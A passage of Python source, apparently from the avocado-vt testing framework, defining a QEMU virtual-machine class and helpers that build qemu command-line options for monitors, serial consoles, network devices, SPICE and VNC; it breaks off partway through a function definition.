code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
|---|---|---|---|---|---|
"""
Utility classes and functions to handle Virtual Machine creation using qemu.
:copyright: 2008-2009, 2014 Red Hat Inc.
"""
import time
import os
import logging
import fcntl
import re
import commands
import aexpect
from avocado.core import exceptions
from avocado.utils import process
from avocado.utils import crypto
from .qemu_devices import qdevices, qcontainer
from . import utils_misc
from . import virt_vm
from . import test_setup
from . import qemu_monitor
from . import qemu_virtio_port
from . import remote
from . import data_dir
from . import utils_net
from . import arch
from . import storage
from . import error_context
class QemuSegFaultError(virt_vm.VMError):
def __init__(self, crash_message):
virt_vm.VMError.__init__(self, crash_message)
self.crash_message = crash_message
def __str__(self):
return "Qemu crashed: %s" % self.crash_message
class VMMigrateProtoUnsupportedError(virt_vm.VMMigrateProtoUnknownError):
"""
When QEMU tells us it doesn't know about a given migration protocol.
This usually happens when we're testing older QEMU. It makes sense to
skip the test in this situation.
"""
def __init__(self, protocol=None, output=None):
self.protocol = protocol
self.output = output
def __str__(self):
return ("QEMU reports it doesn't know migration protocol '%s'. "
"QEMU output: %s" % (self.protocol, self.output))
class KVMInternalError(virt_vm.VMError):
pass
class ImageUnbootableError(virt_vm.VMError):
def __init__(self, name):
virt_vm.VMError.__init__(self, name)
self.name = name
def __str__(self):
return ("VM '%s' can't bootup from image,"
" check your boot disk image file." % self.name)
def clean_tmp_files():
if os.path.isfile(CREATE_LOCK_FILENAME):
os.unlink(CREATE_LOCK_FILENAME)
CREATE_LOCK_FILENAME = os.path.join(data_dir.get_tmp_dir(),
'avocado-vt-vm-create.lock')
class VM(virt_vm.BaseVM):
"""
This class handles all basic VM operations.
"""
MIGRATION_PROTOS = ['rdma', 'x-rdma', 'tcp', 'unix', 'exec', 'fd']
# By default we inherit all timeouts from the base VM class except...
CLOSE_SESSION_TIMEOUT = 30
def __init__(self, name, params, root_dir, address_cache, state=None):
"""
Initialize the object and set a few attributes.
:param name: The name of the object
:param params: A dict containing VM params
(see method make_create_command for a full description)
:param root_dir: Base directory for relative filenames
:param address_cache: A dict that maps MAC addresses to IP addresses
:param state: If provided, use this as self.__dict__
"""
if state:
self.__dict__ = state
else:
self.process = None
self.serial_ports = []
self.serial_console_log = None
self.serial_console = None
self.virtio_console = None
self.redirs = {}
self.spice_options = {}
self.vnc_port = 5900
self.monitors = []
self.virtio_ports = [] # virtio_console / virtio_serialport
self.pci_assignable = None
self.uuid = None
self.vcpu_threads = []
self.vhost_threads = []
self.devices = None
self.logs = {}
self.remote_sessions = []
self.logsessions = {}
self.name = name
self.params = params
self.root_dir = root_dir
self.ip_version = self.params.get("ip_version", "ipv4")
self.address_cache = address_cache
self.index_in_use = {}
# This usb_dev_dict member stores usb controller and device info,
# It's dict, each key is an id of usb controller,
# and key's value is a list, contains usb devices' ids which
# attach to this controller.
# A filled usb_dev_dict may look like:
# { "usb1" : ["stg1", "stg2", "stg3", "stg4", "stg5", "stg6"],
# "usb2" : ["stg7", "stg8"],
# ...
# }
# This structure can used in usb hotplug/unplug test.
self.usb_dev_dict = {}
self.driver_type = 'qemu'
self.params['driver_type_' + self.name] = self.driver_type
# virtnet init depends on vm_type/driver_type being set w/in params
super(VM, self).__init__(name, params)
# un-overwrite instance attribute, virtnet db lookups depend on this
if state:
self.instance = state['instance']
self.qemu_command = ''
self.start_time = 0.0
self.start_monotonic_time = 0.0
self.last_boot_index = 0
self.last_driver_index = 0
def verify_alive(self):
"""
Make sure the VM is alive and that the main monitor is responsive.
:raise VMDeadError: If the VM is dead
:raise: Various monitor exceptions if the monitor is unresponsive
"""
self.verify_disk_image_bootable()
self.verify_userspace_crash()
self.verify_kernel_crash()
self.verify_illegal_instruction()
self.verify_kvm_internal_error()
try:
virt_vm.BaseVM.verify_alive(self)
if self.monitor:
self.monitor.verify_responsive()
except virt_vm.VMDeadError:
raise virt_vm.VMDeadError(self.process.get_status(),
self.process.get_output())
def is_alive(self):
"""
Return True if the VM is alive and its monitor is responsive.
"""
return not self.is_dead() and (not self.catch_monitor or
self.catch_monitor.is_responsive())
def is_dead(self):
"""
Return True if the qemu process is dead.
"""
return not self.process or not self.process.is_alive()
def is_paused(self):
"""
Return True if the qemu process is paused ('stop'ed)
"""
if self.is_dead():
return False
try:
self.verify_status("paused")
return True
except virt_vm.VMStatusError:
return False
def verify_status(self, status):
"""
Check VM status
:param status: Optional VM status, 'running' or 'paused'
:raise VMStatusError: If the VM status is not same as parameter
"""
if not self.monitor.verify_status(status):
raise virt_vm.VMStatusError('Unexpected VM status: "%s"' %
self.monitor.get_status())
def verify_userspace_crash(self):
"""
Verify if the userspace component (qemu) crashed.
"""
if "(core dumped)" in self.process.get_output():
for line in self.process.get_output().splitlines():
if "(core dumped)" in line:
raise QemuSegFaultError(line)
def verify_kvm_internal_error(self):
"""
Verify KVM internal error.
"""
if "KVM internal error." in self.process.get_output():
out = self.process.get_output()
out = out[out.find("KVM internal error."):]
raise KVMInternalError(out)
def verify_disk_image_bootable(self):
if self.params.get("image_verify_bootable") == "yes":
pattern = self.params.get("image_unbootable_pattern")
if not pattern:
raise virt_vm.VMConfigMissingError(self.name,
"image_unbootable_pattern")
try:
seabios_log = self.logsessions['seabios'].get_output()
if re.search(pattern, seabios_log, re.S):
logging.error("Can't boot guest from image.")
# Set 'shutdown_command' to None to force autotest
# shuts down guest with monitor.
self.params["shutdown_command"] = None
raise ImageUnbootableError(self.name)
except KeyError:
pass
def clone(self, name=None, params=None, root_dir=None, address_cache=None,
copy_state=False):
"""
Return a clone of the VM object with optionally modified parameters.
The clone is initially not alive and needs to be started using create().
Any parameters not passed to this function are copied from the source
VM.
:param name: Optional new VM name
:param params: Optional new VM creation parameters
:param root_dir: Optional new base directory for relative filenames
:param address_cache: A dict that maps MAC addresses to IP addresses
:param copy_state: If True, copy the original VM's state to the clone.
Mainly useful for make_create_command().
"""
if name is None:
name = self.name
if params is None:
params = self.params.copy()
if root_dir is None:
root_dir = self.root_dir
if address_cache is None:
address_cache = self.address_cache
if copy_state:
state = self.__dict__.copy()
else:
state = None
return VM(name, params, root_dir, address_cache, state)
def get_serial_console_filename(self, name=None):
"""
Return the serial console filename.
:param name: The serial port name.
"""
if name:
return os.path.join(data_dir.get_tmp_dir(),
"serial-%s-%s" % (name, self.instance))
return os.path.join(data_dir.get_tmp_dir(),
"serial-%s" % self.instance)
def get_serial_console_filenames(self):
"""
Return a list of all serial console filenames
(as specified in the VM's params).
"""
return [self.get_serial_console_filename(_) for _ in
self.params.objects("serials")]
def get_virtio_port_filenames(self):
"""
Get socket file of virtio ports
"""
return [_.hostfile for _ in self.virtio_ports]
def cleanup_serial_console(self):
"""
Close serial console and associated log file
"""
for console_type in ["virtio_console", "serial_console"]:
if hasattr(self, console_type):
console = getattr(self, console_type)
if console:
console.close()
console = None
if hasattr(self, "migration_file"):
try:
os.unlink(self.migration_file)
except OSError:
pass
def make_create_command(self, name=None, params=None, root_dir=None):
"""
Generate a qemu command line. All parameters are optional. If a
parameter is not supplied, the corresponding value stored in the
class attributes is used.
:param name: The name of the object
:param params: A dict containing VM params
:param root_dir: Base directory for relative filenames
:note: The params dict should contain:
mem -- memory size in MBs
cdrom -- ISO filename to use with the qemu -cdrom parameter
extra_params -- a string to append to the qemu command
shell_port -- port of the remote shell daemon on the guest
(SSH, Telnet or the home-made Remote Shell Server)
shell_client -- client program to use for connecting to the
remote shell daemon on the guest (ssh, telnet or nc)
x11_display -- if specified, the DISPLAY environment variable
will be be set to this value for the qemu process (useful for
SDL rendering)
images -- a list of image object names, separated by spaces
nics -- a list of NIC object names, separated by spaces
For each image in images:
drive_format -- string to pass as 'if' parameter for this
image (e.g. ide, scsi)
image_snapshot -- if yes, pass 'snapshot=on' to qemu for
this image
image_boot -- if yes, pass 'boot=on' to qemu for this image
In addition, all parameters required by get_image_filename.
For each NIC in nics:
nic_model -- string to pass as 'model' parameter for this
NIC (e.g. e1000)
"""
# Helper function for command line option wrappers
def _add_option(option, value, option_type=None, first=False):
"""
Add option to qemu parameters.
"""
if first:
fmt = " %s=%s"
else:
fmt = ",%s=%s"
if option_type is bool:
# Decode value for bool parameter (supports True, False, None)
if value in ['yes', 'on', True]:
return fmt % (option, "on")
elif value in ['no', 'off', False]:
return fmt % (option, "off")
elif value and isinstance(value, bool):
return fmt % (option, "on")
elif value and isinstance(value, str):
# "EMPTY_STRING" and "NULL_STRING" is used for testing illegal
# foramt of option.
# "EMPTY_STRING": set option as a empty string "".
# "NO_EQUAL_STRING": set option as a option string only,
# even without "=".
# (In most case, qemu-kvm should recognize it as "<null>")
if value == "NO_EQUAL_STRING":
return ",%s" % option
if value == "EMPTY_STRING":
value = '""'
return fmt % (option, str(value))
return ""
# Wrappers for all supported qemu command line parameters.
# This is meant to allow support for multiple qemu versions.
# Each of these functions receives the output of 'qemu -help'
# as a parameter, and should add the requested command line
# option accordingly.
def add_name(name):
return " -name '%s'" % name
def process_sandbox(devices, action):
if action == "add":
if devices.has_option("sandbox"):
return " -sandbox on "
elif action == "rem":
if devices.has_option("sandbox"):
return " -sandbox off "
def add_human_monitor(devices, monitor_name, filename):
if not devices.has_option("chardev"):
return " -monitor unix:'%s',server,nowait" % filename
monitor_id = "hmp_id_%s" % monitor_name
cmd = " -chardev socket"
cmd += _add_option("id", monitor_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -mon chardev=%s" % monitor_id
cmd += _add_option("mode", "readline")
return cmd
def add_qmp_monitor(devices, monitor_name, filename):
if not devices.has_option("qmp"):
logging.warn("Fallback to human monitor since qmp is"
" unsupported")
return add_human_monitor(devices, monitor_name, filename)
if not devices.has_option("chardev"):
return " -qmp unix:'%s',server,nowait" % filename
monitor_id = "qmp_id_%s" % monitor_name
cmd = " -chardev socket"
cmd += _add_option("id", monitor_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -mon chardev=%s" % monitor_id
cmd += _add_option("mode", "control")
return cmd
def add_serial(devices, name, filename):
if (not devices.has_option("chardev") or
not any(devices.has_device(dev)
for dev in ("isa-serial", "sclpconsole", "spapr-vty"))):
return " -serial unix:'%s',server,nowait" % filename
serial_id = "serial_id_%s" % name
cmd = " -chardev socket"
cmd += _add_option("id", serial_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
if '86' in params.get('vm_arch_name', arch.ARCH):
cmd += " -device isa-serial"
elif 'ppc' in params.get('vm_arch_name', arch.ARCH):
cmd += " -device spapr-vty"
# Workaround for console issue, details:
# lists.gnu.org/archive/html/qemu-ppc/2013-10/msg00129.html
cmd += _add_option("reg", "0x30000000")
elif 's390x' in params.get('vm_arch_name', arch.ARCH):
# Only for s390x console:
# This is only console option supported now.
cmd += " -device sclpconsole"
cmd += _add_option("chardev", serial_id)
return cmd
def add_chardev(devices, params, qid=None):
"""
Generate qdevices.CharDevice object
:param devices: device container object
:param params: dict to create char device object
:param qid: char device ID
"""
if not devices.has_option("chardev"):
logging.warn("'chardev' option not support")
return None
dynamic = False
chardev = qdevices.CharDevice(params=params)
if not qid:
devid = utils_misc.generate_random_id()
dynamic = True
chardev.set_param("id", devid, dynamic=dynamic)
return chardev
def add_virtio_port(devices, chardev, params, name, bus, index=None):
"""
Appends virtio_serialport or virtio_console device to cmdline.
:param chardev: qdevices.CharDevice object
:param params: Space sepparated chardev params
:param name: Name of the port
:param bus: Which virtio-serial-pci device use
:param index: Index of the current virtio_port
"""
def get_extra_options(params):
"""Get extra params pairs"""
options = dict()
extra_params = params.get('virtio_port_params', '')
for _ in extra_params.split():
try:
if "=" not in _:
key, value = _, "NO_EQUAL_STRING"
else:
key, value = _.split('=')
options[key] = value
except Exception:
options.clear()
msg = ("Invaild params %s in " % _ +
"'virtio_port_param' = %s" % extra_params)
logging.error(msg)
return options
# used by spiceagent (com.redhat.spice.*)
if 'console' in params.get('virtio_port_type'):
port_type = 'virtconsole'
else:
port_type = 'virtserialport'
virtio_port = QDevice(port_type)
virtio_port.set_param("bus", bus)
if params.get('virtio_port_name_prefix'):
prefix = params["virtio_port_name_prefix"]
name = "%s%d" % (prefix, index)
virtio_port.set_param("name", name)
virtio_port.set_param("chardev", chardev.get_qid())
for key, value in get_extra_options(params).items():
virtio_port.set_param(key, value)
if not virtio_port.get_param("id"):
devid = utils_misc.generate_random_id()
virtio_port.set_param("id", devid, dynamic=True)
return virtio_port
def add_log_seabios(devices):
if not devices.has_device("isa-debugcon"):
return ""
default_id = "seabioslog_id_%s" % self.instance
filename = os.path.join(data_dir.get_tmp_dir(),
"seabios-%s" % self.instance)
self.logs["seabios"] = filename
cmd = " -chardev socket"
cmd += _add_option("id", default_id)
cmd += _add_option("path", filename)
cmd += _add_option("server", "NO_EQUAL_STRING")
cmd += _add_option("nowait", "NO_EQUAL_STRING")
cmd += " -device isa-debugcon"
cmd += _add_option("chardev", default_id)
cmd += _add_option("iobase", "0x402")
return cmd
def add_log_anaconda(devices, pci_bus='pci.0'):
chardev_id = "anacondalog_chardev_%s" % self.instance
vioser_id = "anacondalog_vioser_%s" % self.instance
filename = os.path.join(data_dir.get_tmp_dir(),
"anaconda-%s" % self.instance)
self.logs["anaconda"] = filename
dev = qdevices.QCustomDevice('chardev', backend='backend')
dev.set_param('backend', 'socket')
dev.set_param('id', chardev_id)
dev.set_param("path", filename)
dev.set_param("server", 'NO_EQUAL_STRING')
dev.set_param("nowait", 'NO_EQUAL_STRING')
devices.insert(dev)
if params.get('machine_type').startswith("arm64-mmio"):
dev = QDevice('virtio-serial-device')
else:
dev = QDevice('virtio-serial-pci', parent_bus=pci_bus)
dev.set_param("id", vioser_id)
devices.insert(dev)
dev = QDevice('virtserialport')
dev.set_param("bus", "%s.0" % vioser_id)
dev.set_param("chardev", chardev_id)
dev.set_param("name", "org.fedoraproject.anaconda.log.0")
devices.insert(dev)
def add_smp(devices):
smp_str = " -smp %d" % self.cpuinfo.smp
smp_pattern = "smp .*n\[,maxcpus=cpus\].*"
if devices.has_option(smp_pattern):
smp_str += ",maxcpus=%d" % self.cpuinfo.maxcpus
smp_str += ",cores=%d" % self.cpuinfo.cores
smp_str += ",threads=%d" % self.cpuinfo.threads
smp_str += ",sockets=%d" % self.cpuinfo.sockets
return smp_str
def add_nic(devices, vlan, model=None, mac=None, device_id=None,
netdev_id=None, nic_extra_params=None, pci_addr=None,
bootindex=None, queues=1, vectors=None, pci_bus='pci.0',
ctrl_mac_addr=None):
if model == 'none':
return
if devices.has_option("device"):
if not model:
model = "rtl8139"
elif model == "virtio":
machine_type = self.params.get("machine_type")
if "s390" in machine_type:
model = "virtio-net-ccw"
elif "mmio" in machine_type:
model = "virtio-net-device"
else:
model = "virtio-net-pci"
dev = QDevice(model)
if ctrl_mac_addr and ctrl_mac_addr in ["on", "off"]:
dev.set_param('ctrl_mac_addr', ctrl_mac_addr)
dev.set_param('mac', mac, dynamic=True)
# only pci domain=0,bus=0,function=0 is supported for now.
#
# libvirt gains the pci_slot, free_pci_addr here,
# value by parsing the xml file, i.e. counting all the
# pci devices and store the number.
if model == 'virtio-net-device':
dev.parent_bus = {'type': 'virtio-bus'}
elif model == 'virtio-net-ccw': # For s390x platform
dev.parent_bus = {'type': 'virtio-bus'}
elif model != 'spapr-vlan':
dev.parent_bus = pci_bus
dev.set_param('addr', pci_addr)
if nic_extra_params:
nic_extra_params = (_.split('=', 1) for _ in
nic_extra_params.split(',') if _)
for key, val in nic_extra_params:
dev.set_param(key, val)
dev.set_param("bootindex", bootindex)
if 'aarch64' in params.get('vm_arch_name', arch.ARCH):
if "rombar" in devices.execute_qemu("-device %s,?"
% model):
dev.set_param("rombar", 0)
else:
dev = qdevices.QCustomDevice('net', backend='type')
dev.set_param('type', 'nic')
dev.set_param('model', model)
dev.set_param('macaddr', mac, 'NEED_QUOTE', True)
dev.set_param('id', device_id, 'NEED_QUOTE')
if "virtio" in model:
if int(queues) > 1:
dev.set_param('mq', 'on')
if vectors:
dev.set_param('vectors', vectors)
if devices.has_option("netdev"):
dev.set_param('netdev', netdev_id)
else:
dev.set_param('vlan', vlan)
devices.insert(dev)
def add_net(devices, vlan, nettype, ifname=None, tftp=None,
bootfile=None, hostfwd=[], netdev_id=None,
netdev_extra_params=None, tapfds=None, script=None,
downscript=None, vhost=None, queues=None, vhostfds=None,
add_queues=None, helper=None, add_tapfd=None,
add_vhostfd=None, vhostforce=None):
mode = None
if nettype in ['bridge', 'network', 'macvtap']:
mode = 'tap'
elif nettype == 'user':
mode = 'user'
else:
logging.warning("Unknown/unsupported nettype %s" % nettype)
return ''
if devices.has_option("netdev"):
cmd = " -netdev %s,id=%s" % (mode, netdev_id)
cmd_nd = cmd
if vhost:
if vhost in ["on", "off"]:
cmd += ",vhost=%s" % vhost
elif vhost == "vhost=on": # Keeps compatibility with old.
cmd += ",%s" % vhost
cmd_nd = cmd
if vhostfds:
if (int(queues) > 1 and
'vhostfds=' in devices.get_help_text()):
cmd += ",vhostfds=%(vhostfds)s"
cmd_nd += ",vhostfds=DYN"
else:
txt = ""
if int(queues) > 1:
txt = "qemu do not support vhost multiqueue,"
txt += " Fall back to single queue."
if 'vhostfd=' in devices.get_help_text():
cmd += ",vhostfd=%(vhostfd)s"
cmd_nd += ",vhostfd=DYN"
else:
txt += " qemu do not support vhostfd."
if txt:
logging.warn(txt)
# For negative test
if add_vhostfd:
cmd += ",vhostfd=%(vhostfd)s"
cmd_nd += ",vhostfd=%(vhostfd)s"
if vhostforce in ["on", "off"]:
cmd += ",vhostforce=%s" % vhostforce
cmd_nd = cmd
if netdev_extra_params:
cmd += "%s" % netdev_extra_params
cmd_nd += "%s" % netdev_extra_params
else:
cmd = " -net %s,vlan=%d" % (mode, vlan)
cmd_nd = cmd
if mode == "tap":
if script:
cmd += ",script='%s'" % script
cmd += ",downscript='%s'" % (downscript or "no")
cmd_nd = cmd
if ifname:
cmd += ",ifname='%s'" % ifname
cmd_nd = cmd
elif tapfds:
if (int(queues) > 1 and
',fds=' in devices.get_help_text()):
cmd += ",fds=%(tapfds)s"
cmd_nd += ",fds=DYN"
else:
cmd += ",fd=%(tapfd)s"
cmd_nd += ",fd=DYN"
# For negative test
if add_tapfd:
cmd += ",fd=%(tapfd)s"
cmd_nd += ",fd=%(tapfd)s"
elif mode == "user":
if tftp and "[,tftp=" in devices.get_help_text():
cmd += ",tftp='%s'" % tftp
cmd_nd = cmd
if bootfile and "[,bootfile=" in devices.get_help_text():
cmd += ",bootfile='%s'" % bootfile
cmd_nd = cmd
if "[,hostfwd=" in devices.get_help_text():
for i in xrange(len(hostfwd)):
cmd += (",hostfwd=tcp::%%(host_port%d)s"
"-:%%(guest_port%d)s" % (i, i))
cmd_nd += ",hostfwd=tcp::DYN-:%%(guest_port)ds"
if add_queues and queues:
cmd += ",queues=%s" % queues
cmd_nd += ",queues=%s" % queues
if helper:
cmd += ",helper=%s" % helper
cmd_nd += ",helper=%s" % helper
return cmd, cmd_nd
def add_floppy(filename, index):
cmd_list = [" -fda '%s'", " -fdb '%s'"]
return cmd_list[index] % filename
def add_tftp(devices, filename):
# If the new syntax is supported, don't add -tftp
if "[,tftp=" in devices.get_help_text():
return ""
else:
return " -tftp '%s'" % filename
def add_bootp(devices, filename):
# If the new syntax is supported, don't add -bootp
if "[,bootfile=" in devices.get_help_text():
return ""
else:
return " -bootp '%s'" % filename
def add_tcp_redir(devices, host_port, guest_port):
# If the new syntax is supported, don't add -redir
if "[,hostfwd=" in devices.get_help_text():
return ""
else:
return " -redir tcp:%s::%s" % (host_port, guest_port)
def add_vnc(vnc_port, vnc_password='no', extra_params=None):
vnc_cmd = " -vnc :%d" % (vnc_port - 5900)
if vnc_password == "yes":
vnc_cmd += ",password"
if extra_params:
vnc_cmd += ",%s" % extra_params
return vnc_cmd
def add_sdl(devices):
if devices.has_option("sdl"):
return " -sdl"
else:
return ""
def add_nographic():
return " -nographic"
def add_uuid(uuid):
return " -uuid '%s'" % uuid
def add_qemu_option(devices, name, optsinfo):
"""
Add qemu option, such as '-msg timestamp=on|off'
:param devices: qcontainer object
:param name: string type option name
:param optsinfo: list like [(key, val, vtype)]
"""
if devices.has_option(name):
options = []
for info in optsinfo:
key, val = info[:2]
if key and val:
options.append("%s=%%(%s)s" % (key, key))
else:
options += filter(None, info[:2])
options = ",".join(options)
cmdline = "-%s %s" % (name, options)
device = qdevices.QStringDevice(name, cmdline=cmdline)
for info in optsinfo:
key, val, vtype = info
if key and val:
device.set_param(key, val, vtype, False)
devices.insert(device)
else:
logging.warn("option '-%s' not supportted" % name)
def add_pcidevice(devices, host, params, device_driver="pci-assign",
pci_bus='pci.0'):
if devices.has_device(device_driver):
dev = QDevice(device_driver, parent_bus=pci_bus)
else:
dev = qdevices.QCustomDevice('pcidevice', parent_bus=pci_bus)
help_cmd = "%s -device %s,\? 2>&1" % (qemu_binary, device_driver)
pcidevice_help = process.system_output(help_cmd,
shell=True,
verbose=False)
dev.set_param('host', host)
dev.set_param('id', 'id_%s' % host.replace(":", "."))
fail_param = []
for param in params.get("pci-assign_params", "").split():
value = params.get(param)
if value:
if param in pcidevice_help:
dev.set_param(param, value)
else:
fail_param.append(param)
if fail_param:
msg = ("parameter %s is not support in device pci-assign."
" It only support following parameter:\n %s" %
(", ".join(fail_param), pcidevice_help))
logging.warn(msg)
devices.insert(dev)
def add_virtio_rng(devices, rng_params, parent_bus="pci.0"):
"""
Add virtio-rng device.
:param devices: qcontainer object to contain devices.
:param rng_params: dict include virtio_rng device params.
:param parent_bus: parent bus for virtio-rng-pci.
"""
def set_dev_params(dev, dev_params,
dev_backend, backend_type):
"""
Set QCustomDevice properties by user params dict.
"""
for pro, val in dev_params.iteritems():
suffix = "_%s" % backend_type
if pro.endswith(suffix):
idx = len(suffix)
dev.set_param(pro[:-idx], val)
if dev_backend:
dev.set_param("backend", dev_backend)
dev_id = utils_misc.generate_random_string(8)
dev_id = "%s-%s" % (backend_type, dev_id)
dev.set_param("id", dev_id)
dev_type = "virtio-rng-pci"
if devices.has_device(dev_type):
rng_pci = QDevice(dev_type, parent_bus=parent_bus)
set_dev_params(rng_pci, rng_params, None, dev_type)
rng_dev = qdevices.QCustomDevice(dev_type="object",
backend="backend")
backend = rng_params["backend"]
backend_type = rng_params["backend_type"]
set_dev_params(rng_dev, rng_params, backend, backend_type)
if backend_type == "chardev":
backend = rng_params["chardev_backend"]
backend_type = rng_params["%s_type" % backend]
char_dev = qdevices.QCustomDevice(dev_type="chardev",
backend="backend")
set_dev_params(char_dev, rng_params,
backend, backend_type)
rng_dev.set_param("chardev", char_dev.get_qid())
devices.insert(char_dev)
devices.insert(rng_dev)
rng_pci.set_param("rng", rng_dev.get_qid())
devices.insert(rng_pci)
def add_memorys(devices, params):
"""
Add memory controler by params
:param devices: VM devices container
"""
options = []
params = params.object_params("mem")
if params.get("mem"):
options.append("%s" % params["mem"])
if params.get("slots") and params.get("maxmem"):
options.append("slots=%s" % params["slots"])
options.append("maxmem=%s" % params["maxmem"])
if not options:
return devices
cmdline = "-m %s" % ",".join(options)
dev = StrDev("mem", cmdline=cmdline)
devices.insert(dev)
for name in params.objects("mem_devs"):
mem_params = params.object_params(name)
memdevs = devices.memory_define_by_params(mem_params, name)
devices.insert(memdevs)
return devices
def add_spice_rhel5(devices, spice_params, port_range=(3100, 3199)):
"""
processes spice parameters on rhel5 host.
:param spice_options - dict with spice keys/values
:param port_range - tuple with port range, default: (3000, 3199)
"""
if devices.has_option("spice"):
cmd = " -spice"
else:
return ""
spice_help = ""
if devices.has_option("spice-help"):
spice_help = commands.getoutput("%s -device \\?" % qemu_binary)
s_port = str(utils_misc.find_free_port(*port_range))
self.spice_options['spice_port'] = s_port
cmd += " port=%s" % s_port
for param in spice_params.split():
value = params.get(param)
if value:
if bool(re.search(param, spice_help, re.M)):
cmd += ",%s=%s" % (param, value)
else:
msg = ("parameter %s is not supported in spice. It "
"only supports the following parameters:\n %s"
% (param, spice_help))
logging.warn(msg)
else:
cmd += ",%s" % param
if devices.has_option("qxl"):
qxl_dev_nr = params.get("qxl_dev_nr", 1)
cmd += " -qxl %s" % qxl_dev_nr
return cmd
def add_spice(port_range=(3000, 3199),
tls_port_range=(3200, 3399)):
"""
processes spice parameters
:param port_range - tuple with port range, default: (3000, 3199)
:param tls_port_range - tuple with tls port range,
default: (3200, 3399)
"""
spice_opts = [] # will be used for ",".join()
tmp = None
def optget(opt):
"""a helper function"""
return self.spice_options.get(opt)
def set_yes_no_value(key, yes_value=None, no_value=None):
"""just a helper function"""
tmp = optget(key)
if tmp == "no" and no_value:
spice_opts.append(no_value)
elif tmp == "yes" and yes_value:
spice_opts.append(yes_value)
def set_value(opt_string, key, fallback=None):
"""just a helper function"""
tmp = optget(key)
if tmp:
spice_opts.append(opt_string % tmp)
elif fallback:
spice_opts.append(fallback)
s_port = str(utils_misc.find_free_port(*port_range))
if optget("spice_port") == "generate":
if not self.is_alive():
self.spice_options['spice_port'] = s_port
spice_opts.append("port=%s" % s_port)
self.spice_port = s_port
else:
self.spice_options['spice_port'] = self.spice_port
spice_opts.append("port=%s" % self.spice_port)
else:
set_value("port=%s", "spice_port")
set_value("password=%s", "spice_password", "disable-ticketing")
if optget("listening_addr") == "ipv4":
host_ip = utils_net.get_host_ip_address(self.params)
self.spice_options['listening_addr'] = "ipv4"
spice_opts.append("addr=%s" % host_ip)
# set_value("addr=%s", "listening_addr", )
elif optget("listening_addr") == "ipv6":
host_ip = utils_net.get_host_ip_address(self.params)
host_ip_ipv6 = utils_misc.convert_ipv4_to_ipv6(host_ip)
self.spice_options['listening_addr'] = "ipv6"
spice_opts.append("addr=%s" % host_ip_ipv6)
set_yes_no_value(
"disable_copy_paste", yes_value="disable-copy-paste")
set_value("addr=%s", "spice_addr")
if optget("spice_ssl") == "yes":
# SSL only part
t_port = str(utils_misc.find_free_port(*tls_port_range))
if optget("spice_tls_port") == "generate":
if not self.is_alive():
self.spice_options['spice_tls_port'] = t_port
spice_opts.append("tls-port=%s" % t_port)
self.spice_tls_port = t_port
else:
self.spice_options[
'spice_tls_port'] = self.spice_tls_port
spice_opts.append("tls-port=%s" % self.spice_tls_port)
else:
set_value("tls-port=%s", "spice_tls_port")
prefix = optget("spice_x509_prefix")
if ((prefix is None or not os.path.exists(prefix)) and
(optget("spice_gen_x509") == "yes")):
# Generate spice_x509_* is not always necessary,
# Regenerate them will make your existing VM
# not longer accessiable via encrypted spice.
c_subj = optget("spice_x509_cacert_subj")
s_subj = optget("spice_x509_server_subj")
# If CN is not specified, add IP of host
if s_subj[-3:] == "CN=":
s_subj += utils_net.get_host_ip_address(self.params)
passwd = optget("spice_x509_key_password")
secure = optget("spice_x509_secure")
utils_misc.create_x509_dir(prefix, c_subj, s_subj, passwd,
secure)
tmp = optget("spice_x509_dir")
if tmp == "yes":
spice_opts.append("x509-dir=%s" % (prefix))
elif tmp == "no":
cacert = optget("spice_x509_cacert_file")
server_key = optget("spice_x509_key_file")
server_cert = optget("spice_x509_cert_file")
keyfile_str = ("x509-key-file=%s,x509-cacert-file=%s,"
"x509-cert-file=%s" %
(os.path.join(prefix, server_key),
os.path.join(prefix, cacert),
os.path.join(prefix, server_cert)))
spice_opts.append(keyfile_str)
set_yes_no_value("spice_x509_secure",
yes_value="x509-key-password=%s" %
(optget("spice_x509_key_password")))
tmp = optget("spice_secure_channels")
if tmp:
for item in tmp.split(","):
spice_opts.append("tls-channel=%s" % (item.strip()))
# Less common options
set_value("seamless-migration=%s", "spice_seamless_migration")
set_value("image-compression=%s", "spice_image_compression")
set_value("jpeg-wan-compression=%s", "spice_jpeg_wan_compression")
set_value("zlib-glz-wan-compression=%s",
"spice_zlib_glz_wan_compression")
set_value("streaming-video=%s", "spice_streaming_video")
set_value("agent-mouse=%s", "spice_agent_mouse")
set_value("playback-compression=%s", "spice_playback_compression")
set_yes_no_value("spice_ipv4", yes_value="ipv4")
set_yes_no_value("spice_ipv6", yes_value="ipv6")
return " -spice %s" % (",".join(spice_opts))
def add_qxl(qxl_nr, base_addr=29):
"""
adds extra qxl devices
:param qxl_nr total number of qxl devices
:param base_addr: base address of extra qxl device
"""
qxl_str = ""
for index in range(1, qxl_nr):
addr = base_addr + index
qxl_str += " -device qxl,id=video%d,addr=0x%x" % (index, addr)
return qxl_str
def add_vga(vga):
return " -vga %s" % vga
def add_kernel(filename):
return " -kernel '%s'" % filename
def add_initrd(filename):
return " -initrd '%s'" % filename
def add_rtc(devices):
# Pay attention that rtc-td-hack is for early version
# if "rtc " in help:
if devices.has_option("rtc"):
cmd = " -rtc base=%s" % params.get("rtc_base", "utc")
cmd += _add_option("clock", params.get("rtc_clock", "host"))
cmd += _add_option("driftfix", params.get("rtc_drift", None))
return cmd
elif devices.has_option("rtc-td-hack"):
return " -rtc-td-hack"
else:
return ""
def add_kernel_cmdline(cmdline):
return " -append '%s'" % cmdline
def add_testdev(devices, filename=None):
if devices.has_device("testdev"):
return (" -chardev file,id=testlog,path=%s"
" -device testdev,chardev=testlog" % filename)
elif devices.has_device("pc-testdev"):
return " -device pc-testdev"
else:
return ""
def add_isa_debug_exit(devices, iobase=0xf4, iosize=0x04):
if devices.has_device("isa-debug-exit"):
return (" -device isa-debug-exit,iobase=%s,iosize=%s" %
(iobase, iosize))
else:
return ""
def add_no_hpet(devices):
if devices.has_option("no-hpet"):
return " -no-hpet"
else:
return ""
def add_cpu_flags(devices, cpu_model, flags=None, vendor_id=None,
